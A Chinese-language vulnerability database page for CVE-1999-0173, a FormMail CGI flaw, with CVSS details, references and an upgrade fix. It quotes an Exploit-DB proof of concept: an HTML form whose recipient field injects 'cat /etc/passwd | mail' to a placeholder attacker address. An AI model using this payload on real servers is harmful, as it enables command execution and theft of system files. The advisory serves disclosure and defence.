CVE-1999-0173
CVSS5.0
发布时间 :1997-01-01 00:00:00
修订时间 :2008-09-09 08:33:54
NMCOE    

[原文]FormMail CGI program can be used by web servers other than the host server that the program resides on.


[CNNVD]FormMail CGI程序漏洞(CNNVD-199701-009)

        FormMail CGI程序可以被除了该程序所属的主服务器以外的网络服务器使用。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0173
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0173
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199701-009
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

FormMail CGI程序漏洞
中危 未知
1997-01-01 00:00:00 2006-09-05 00:00:00
远程  
        FormMail CGI程序可以被除了该程序所属的主服务器以外的网络服务器使用。

- 公告与补丁

        

- 漏洞信息 (20486)

Matt Wright FormMail 1.x Cross-Site Request Forgery Vulnerability (EDBID:20486)
unix remote
1997-01-01 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/2080/info

FormMail is a widely-used web-based e-mail gateway, which allows form-based input to be emailed to a specified user.

A web server can use a remote site's FormMail script without authorization, using remote system resources or exploiting other vulnerabilities in the script. For example, this issue can be used to exploit BID 2079, "Matt Wright FormMail Remote Command Execution Vulnerability". 

<html><head><title>hack</title></head>
<body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="me@mymail.host; cat /etc/passwd | mail me@mymail.host">
<input type="submit" name="submit" value="submit">
</form></body></html> 		

- 漏洞信息

1684
Matt Wright FormMail Arbitrary Command Execution CSRF
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

1997-01-01 Unknow
1997-01-01 Unknow

- 解决方案

Upgrade to version 1.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站